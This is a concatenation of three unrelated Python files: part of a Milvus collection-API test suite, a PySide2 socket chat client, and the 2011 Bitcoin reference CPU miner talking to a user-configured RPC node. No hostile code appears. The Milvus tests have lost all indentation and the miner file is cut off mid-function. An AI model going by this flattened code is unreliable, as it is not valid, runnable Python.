status = connect.create_collection(param)
logging.getLogger().info(status)
status, result = connect.describe_collection(collection_name)
logging.getLogger().info(result)
assert result.index_file_size == 1024
def test_create_collection_no_metric_type(self, connect):
'''
target: test create collection with no metric_type params
        method: create collection without the metric_type param
expected: create status return ok, use default L2
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size}
status = connect.create_collection(param)
status, result = connect.describe_collection(collection_name)
logging.getLogger().info(result)
assert result.metric_type == MetricType.L2
"""
******************************************************************
The following cases are used to test `describe_collection` function
******************************************************************
"""
def test_collection_describe_result(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
        expected: collection_name equals the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.L2
@pytest.mark.level(2)
def test_collection_describe_collection_name_ip(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
        expected: collection_name equals the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.IP
@pytest.mark.level(2)
def test_collection_describe_collection_name_jaccard(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
        expected: collection_name equals the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.JACCARD
@pytest.mark.level(2)
def test_collection_describe_collection_name_hamming(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
        expected: collection_name equals the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.HAMMING
def test_collection_describe_collection_name_substructure(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
        expected: collection_name equals the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUBSTRUCTURE}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.SUBSTRUCTURE
def test_collection_describe_collection_name_superstructure(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
        expected: collection_name equals the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUPERSTRUCTURE}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.SUPERSTRUCTURE
# TODO: enable
@pytest.mark.level(2)
def _test_collection_describe_collection_name_multiprocessing(self, connect, args):
'''
target: test describe collection created with multiprocess
method: create collection, assert the value returned by describe method
        expected: collection_name equals the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
def describecollection(milvus):
status, res = milvus.describe_collection(collection_name)
assert res.collection_name == collection_name
process_num = 4
processes = []
for i in range(process_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=describecollection, args=(milvus,))
processes.append(p)
p.start()
for p in processes:
p.join()
# @pytest.mark.level(2)
# def test_collection_describe_without_connection(self, collection, dis_connect):
# '''
# target: test describe collection, without connection
# method: describe collection with correct params, with a disconnected instance
# expected: describe raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.describe_collection(collection)
def test_collection_describe_dimension(self, connect):
'''
target: test describe collection created with correct params
        method: create collection, assert the dimension value returned by describe method
        expected: dimension equals the dimension used at creation
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim+1,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.dimension == dim+1
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
def test_drop_collection(self, connect, collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(collection)
assert not assert_has_collection(connect, collection)
@pytest.mark.level(2)
def test_drop_collection_ip(self, connect, ip_collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(ip_collection)
assert not assert_has_collection(connect, ip_collection)
@pytest.mark.level(2)
def test_drop_collection_jaccard(self, connect, jac_collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(jac_collection)
assert not assert_has_collection(connect, jac_collection)
@pytest.mark.level(2)
def test_drop_collection_hamming(self, connect, ham_collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(ham_collection)
assert not assert_has_collection(connect, ham_collection)
# @pytest.mark.level(2)
# def test_collection_delete_without_connection(self, collection, dis_connect):
# '''
# target: test describe collection, without connection
# method: describe collection with correct params, with a disconnected instance
# expected: describe raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.drop_collection(collection)
def test_drop_collection_not_existed(self, connect):
'''
        target: test delete a collection that does not exist
        method: drop a collection with a random name not present in db,
                assert the value returned by delete method
expected: status not ok
'''
collection_name = gen_unique_str("test_collection")
status = connect.drop_collection(collection_name)
assert not status.OK()
def test_delete_create_collection_repeatedly(self, connect):
'''
target: test delete and create the same collection repeatedly
method: try to create the same collection and delete repeatedly,
assert the value returned by delete method
expected: create ok and delete ok
'''
loops = 2
timeout = 5
for i in range(loops):
collection_name = "test_collection"
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status = None
while i < timeout:
status = connect.drop_collection(collection_name)
time.sleep(1)
i += 1
if status.OK():
break
            assert status is not None and status.OK()
# TODO: enable
@pytest.mark.level(2)
def _test_drop_collection_multiprocessing(self, args):
'''
target: test delete collection with multiprocess
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
process_num = 6
processes = []
def deletecollection(milvus):
status = milvus.drop_collection(collection)
# assert not status.code==0
assert assert_has_collection(milvus, collection)
assert status.OK()
for i in range(process_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=deletecollection, args=(milvus,))
processes.append(p)
p.start()
for p in processes:
p.join()
# TODO: enable
@pytest.mark.level(2)
def _test_drop_collection_multiprocessing_multicollection(self, connect):
'''
target: test delete collection with multiprocess
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
process_num = 5
loop_num = 2
processes = []
collection = []
j = 0
while j < (process_num*loop_num):
collection_name = gen_unique_str("test_drop_collection_with_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
j = j + 1
def delete(connect,ids):
i = 0
while i < loop_num:
status = connect.drop_collection(collection[ids*process_num+i])
time.sleep(2)
assert status.OK()
assert not assert_has_collection(connect, collection[ids*process_num+i])
i = i + 1
for i in range(process_num):
ids = i
p = Process(target=delete, args=(connect,ids))
processes.append(p)
p.start()
for p in processes:
p.join()
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
def test_has_collection(self, connect):
'''
        target: test that a created collection exists
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
def test_has_collection_ip(self, connect):
'''
        target: test that a created collection exists
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
def test_has_collection_jaccard(self, connect):
'''
        target: test that a created collection exists
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
def test_has_collection_hamming(self, connect):
'''
        target: test that a created collection exists
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
# @pytest.mark.level(2)
# def test_has_collection_without_connection(self, collection, dis_connect):
# '''
# target: test has collection, without connection
# method: calling has collection with correct params, with a disconnected instance
# expected: has collection raise exception
# '''
# with pytest.raises(Exception) as e:
# assert_has_collection(dis_connect, collection)
def test_has_collection_not_existed(self, connect):
'''
        target: test a collection that was never created
        method: generate a random collection name not present in db,
assert the value returned by has_collection method
expected: False
'''
collection_name = gen_unique_str("test_collection")
assert not assert_has_collection(connect, collection_name)
"""
******************************************************************
The following cases are used to test `show_collections` function
******************************************************************
"""
def test_show_collections(self, connect):
'''
target: test show collections is correct or not, if collection created
        method: create collection, assert the collection name appears in the show_collections result
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status, result = connect.show_collections()
assert status.OK()
assert collection_name in result
def test_show_collections_ip(self, connect):
'''
target: test show collections is correct or not, if collection created
        method: create collection, assert the collection name appears in the show_collections result
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
status, result = connect.show_collections()
assert status.OK()
assert collection_name in result
def test_show_collections_jaccard(self, connect):
'''
target: test show collections is correct or not, if collection created
        method: create collection, assert the collection name appears in the show_collections result
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
status, result = connect.show_collections()
assert status.OK()
assert collection_name in result
def test_show_collections_hamming(self, connect):
'''
target: test show collections is correct or not, if collection created
        method: create collection, assert the collection name appears in the show_collections result
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
status, result = connect.show_collections()
assert status.OK()
assert collection_name in result
def test_show_collections_substructure(self, connect):
'''
target: test show collections is correct or not, if collection created
        method: create collection, assert the collection name appears in the show_collections result
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUBSTRUCTURE}
connect.create_collection(param)
status, result = connect.show_collections()
assert status.OK()
assert collection_name in result
def test_show_collections_superstructure(self, connect):
'''
target: test show collections is correct or not, if collection created
        method: create collection, assert the collection name appears in the show_collections result
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUPERSTRUCTURE}
connect.create_collection(param)
status, result = connect.show_collections()
assert status.OK()
assert collection_name in result
# @pytest.mark.level(2)
# def test_show_collections_without_connection(self, dis_connect):
# '''
# target: test show_collections, without connection
# method: calling show_collections with correct params, with a disconnected instance
# expected: show_collections raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.show_collections()
@pytest.mark.level(2)
def test_show_collections_no_collection(self, connect):
'''
target: test show collections is correct or not, if no collection in db
method: delete all collections,
assert the value returned by show_collections method is equal to []
expected: the status is ok, and the result is equal to []
'''
status, result = connect.show_collections()
if result:
for collection_name in result:
connect.drop_collection(collection_name)
time.sleep(drop_collection_interval_time)
status, result = connect.show_collections()
assert status.OK()
assert len(result) == 0
# TODO: enable
@pytest.mark.level(2)
def _test_show_collections_multiprocessing(self, connect, args):
'''
target: test show collections is correct or not with processes
        method: create collection, assert the collection name appears in the show_collections result
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
def showcollections(milvus):
status, result = milvus.show_collections()
assert status.OK()
assert collection_name in result
process_num = 8
processes = []
for i in range(process_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=showcollections, args=(milvus,))
processes.append(p)
p.start()
for p in processes:
p.join()
"""
******************************************************************
The following cases are used to test `preload_collection` function
******************************************************************
"""
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
@pytest.mark.level(1)
def test_preload_collection(self, connect, collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
status = connect.preload_collection(collection)
assert status.OK()
@pytest.mark.level(1)
def test_preload_collection_ip(self, connect, ip_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
status = connect.preload_collection(ip_collection)
assert status.OK()
@pytest.mark.level(1)
def test_preload_collection_jaccard(self, connect, jac_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.add_vectors(jac_collection, vectors)
status = connect.create_index(jac_collection, index_type, index_param)
status = connect.preload_collection(jac_collection)
assert status.OK()
@pytest.mark.level(1)
def test_preload_collection_hamming(self, connect, ham_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.add_vectors(ham_collection, vectors)
status = connect.create_index(ham_collection, index_type, index_param)
status = connect.preload_collection(ham_collection)
assert status.OK()
@pytest.mark.level(2)
def test_preload_collection_not_existed(self, connect, collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
collection_name = gen_unique_str()
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
status = connect.preload_collection(collection_name)
assert not status.OK()
@pytest.mark.level(2)
def test_preload_collection_not_existed_ip(self, connect, ip_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
collection_name = gen_unique_str()
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
status = connect.preload_collection(collection_name)
assert not status.OK()
@pytest.mark.level(1)
def test_preload_collection_no_vectors(self, connect, collection):
status = connect.preload_collection(collection)
assert status.OK()
@pytest.mark.level(2)
def test_preload_collection_no_vectors_ip(self, connect, ip_collection):
status = connect.preload_collection(ip_collection)
assert status.OK()
    # TODO: use psutil to check memory usage
@pytest.mark.level(1)
def test_preload_collection_memory_usage(self, connect, collection):
pass
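# The tests above repeat the same parameter dictionary with only the metric
# type varying; a small helper like this (illustrative only, not used by the
# suite) captures the pattern:
def _collection_param(collection_name, metric_type=MetricType.L2):
    """Build a create_collection parameter dict with this suite's defaults."""
    return {'collection_name': collection_name,
            'dimension': dim,
            'index_file_size': index_file_size,
            'metric_type': metric_type}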
class TestCollectionInvalid(object):
"""
Test creating collection with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_collection_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert not status.OK()
def test_create_collection_with_empty_collectionname(self, connect):
collection_name = ''
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def test_preload_collection_with_invalid_collectionname(self, connect):
collection_name = ''
with pytest.raises(Exception) as e:
status = connect.preload_collection(collection_name)
class TestCreateCollectionDimInvalid(object):
"""
Test creating collection with invalid dimension
"""
@pytest.fixture(
scope="function",
params=gen_invalid_dims()
)
def get_dim(self, request):
yield request.param
@pytest.mark.level(2)
@pytest.mark.timeout(5)
def test_create_collection_with_invalid_dimension(self, connect, get_dim):
dimension = get_dim
collection = gen_unique_str("test_create_collection_with_invalid_dimension")
param = {'collection_name': collection,
'dimension': dimension,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
if isinstance(dimension, int):
status = connect.create_collection(param)
assert not status.OK()
else:
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
# TODO: max / min index file size
class TestCreateCollectionIndexSizeInvalid(object):
"""
Test creating collections with invalid index_file_size
"""
@pytest.fixture(
scope="function",
params=gen_invalid_file_sizes()
)
def get_file_size(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_collection_with_invalid_file_size(self, connect, collection, get_file_size):
file_size = get_file_size
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': file_size,
'metric_type': MetricType.L2}
if isinstance(file_size, int):
status = connect.create_collection(param)
assert not status.OK()
else:
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
class TestCreateMetricTypeInvalid(object):
"""
Test creating collections with invalid metric_type
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.mark.level(2)
    def test_create_collection_with_invalid_metric_type(self, connect, collection, get_metric_type):
metric_type = get_metric_type
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': 10,
'metric_type': metric_type}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def create_collection(connect, **params):
param = {'collection_name': params["collection_name"],
'dimension': params["dimension"],
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
return status
def search_collection(connect, **params):
status, result = connect.search_vectors(
params["collection_name"],
params["top_k"],
params["query_vectors"],
params={"nprobe": params["nprobe"]})
return status
def preload_collection(connect, **params):
status = connect.preload_collection(params["collection_name"])
return status
def has(connect, **params):
status, result = connect.has_collection(params["collection_name"])
return status
def show(connect, **params):
status, result = connect.show_collections()
return status
def delete(connect, **params):
status = connect.drop_collection(params["collection_name"])
return status
def describe(connect, **params):
status, result = connect.describe_collection(params["collection_name"])
return status
def rowcount(connect, **params):
status, result = connect.count_collection(params["collection_name"])
return status
def create_index(connect, **params):
status = connect.create_index(params["collection_name"], params["index_type"], params["index_param"])
return status
func_map = {
# 0:has,
1:show,
10:create_collection,
11:describe,
12:rowcount,
13:search_collection,
14:preload_collection,
15:create_index,
30:delete
}
def gen_sequence():
raw_seq = func_map.keys()
result = itertools.permutations(raw_seq)
for x in result:
yield x
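# A worked example of the validity rule checked by is_right below (keys are
# func_map entries): (1, 10, 11, 12, 13, 14, 15, 30) is a valid order, since
# show (1) may run before anything exists, every operation above 10 runs
# after create_collection (10), and delete (30) comes last. (11, 10, ...) is
# invalid because describe (11) would run before the collection is created.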
class TestCollectionLogic(object):
@pytest.mark.parametrize("logic_seq", gen_sequence())
@pytest.mark.level(2)
def test_logic(self, connect, logic_seq, args):
if args["handler"] == "HTTP":
pytest.skip("Skip in http mode")
if self.is_right(logic_seq):
self.execute(logic_seq, connect)
else:
self.execute_with_error(logic_seq, connect)
    def is_right(self, seq):
        # permutations() yields tuples, so compare against a sorted list
        if list(seq) == sorted(seq):
            return True
        not_created = True
        has_deleted = False
        for i in range(len(seq)):
            if seq[i] > 10 and not_created:
                return False
            elif seq[i] > 10 and has_deleted:
                return False
            elif seq[i] == 10:
                not_created = False
            elif seq[i] == 30:
                has_deleted = True
        return True
def execute(self, logic_seq, connect):
basic_params = self.gen_params()
for i in range(len(logic_seq)):
# logging.getLogger().info(logic_seq[i])
f = func_map[logic_seq[i]]
status = f(connect, **basic_params)
assert status.OK()
def execute_with_error(self, logic_seq, connect):
basic_params = self.gen_params()
error_flag = False
for i in range(len(logic_seq)):
f = func_map[logic_seq[i]]
status = f(connect, **basic_params)
if not status.OK():
# logging.getLogger().info(logic_seq[i])
error_flag = True
break
        assert error_flag
def gen_params(self):
collection_name = gen_unique_str("test_collection")
top_k = 1
vectors = gen_vectors(2, dim)
param = {'collection_name': collection_name,
'dimension': dim,
'metric_type': MetricType.L2,
'nprobe': 1,
'top_k': top_k,
'index_type': IndexType.IVF_SQ8,
'index_param': {
'nlist': 16384
},
'query_vectors': vectors}
return param
|
client.py
|
import sys
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from frontend.tela_login import *
from frontend.tela_chat import *
class TelaXat(QMainWindow):
def __init__(self, cs, username):
super().__init__()
self.client_socket = cs
# Load GUIs
self.tela_chat = Ui_TelaXAT()
self.tela_chat.setupUi(self)
self.tela_chat.label_user.setText(username)
self.setWindowFlags(Qt.FramelessWindowHint)
self.setAttribute(Qt.WA_TranslucentBackground)
        # Window dragging
self.tela_chat.label_user.mouseMoveEvent = self.moveWindow
self.tela_chat.cha_name.mouseMoveEvent = self.moveWindow
receive_thread = Thread(target=self.recebe)
receive_thread.start()
# Call Functions
self.tela_chat.send_message.clicked.connect(self.btSend)
self.tela_chat.button_exit.clicked.connect(self.exit_)
self.tela_chat.exit_button.clicked.connect(self.quit_)
# Functions
def btSend(self):
msg = self.tela_chat.entry_message.toPlainText()
self.client_socket.send(msg.encode())
self.tela_chat.entry_message.setText('')
def recebe(self):
"""Lida com o recebimento de mensagens"""
while True:
try:
msg = self.client_socket.recv(1024).decode("utf8")
self.tela_chat.menssage_box.append(f'@{msg}')
            except OSError:  # The client has probably left the chat.
break
def exit_(self):
self.client_socket.close()
self.tela_login = MainWindow()
self.tela_login.show()
self.hide()
def closeEvent(self, event):
self.client_socket.close()
event.accept()
    # window dragging
def mousePressEvent(self, event):
self.clickPosition = event.globalPos()
def moveWindow(self, event):
if event.buttons() == Qt.LeftButton:
self.move(self.pos() + event.globalPos() - self.clickPosition)
self.clickPosition = event.globalPos()
event.accept()
    # quit window
def quit_(self):
self.close()
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
        # Connection to the server
HOST = "localhost"
PORT = 50000
self.ADDR = (HOST, PORT)
self.client_socket = socket(AF_INET, SOCK_STREAM)
threadConn = Thread(target=self.ver_conn)
threadConn.start()
# Load GUIs
self.ui = Ui_TelaLogin()
self.ui.setupUi(self)
self.setWindowFlags(Qt.FramelessWindowHint)
self.setAttribute(Qt.WA_TranslucentBackground)
        # Window dragging
self.ui.frame.mouseMoveEvent = self.moveWindow
self.ui.label_status.setStyleSheet(u"border-radius:5px;\n"
"background-color: rgb(255, 0, 0);")
# Call Functions
self.ui.button_login.clicked.connect(self.login)
self.ui.pushButton.clicked.connect(self.quit_)
# Functions
def ver_conn(self):
while True:
try:
self.client_socket.connect(self.ADDR)
self.ui.label_status.setStyleSheet(u"border-radius:5px;\n"
"background-color: rgb(0, 255, 0);")
self.ui.label_on_off.setText('online')
break
            except OSError:
                pass  # server not reachable yet, keep retrying
def login(self):
user = self.ui.username.text()
print(user)
self.client_socket.send(user.encode())
self.tela_chat = TelaXat(self.client_socket, f'@{user}')
self.tela_chat.show()
self.hide()
    # window dragging
def mousePressEvent(self, event):
self.clickPosition = event.globalPos()
def moveWindow(self, event):
if event.buttons() == Qt.LeftButton:
self.move(self.pos() + event.globalPos() - self.clickPosition)
self.clickPosition = event.globalPos()
event.accept()
    # quit window
def quit_(self):
self.close()
if __name__ == "__main__":
    n_clients = 3  # Set the number of clients to launch
app = QApplication(sys.argv)
    windows = [MainWindow() for _ in range(n_clients)]
    for w in windows:
w.show()
sys.exit(app.exec_())
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
        if 'error' in resp_obj and resp_obj['error'] is not None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
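# swap the byte order of a 32-bit word (endianness flip)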
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
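# reverse the byte order within each 32-bit word of a buffer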
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
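# reverse the order of the 32-bit words in a buffer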
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
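        # the nonce occupies bytes 76-80 of the 80-byte block header, i.e.
        # hex characters 152-160 of the getwork 'data' field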
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
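        # recalibrate max_nonce so that one work() pass takes roughly
        # 'scantime' seconds at the measured hash rate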
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
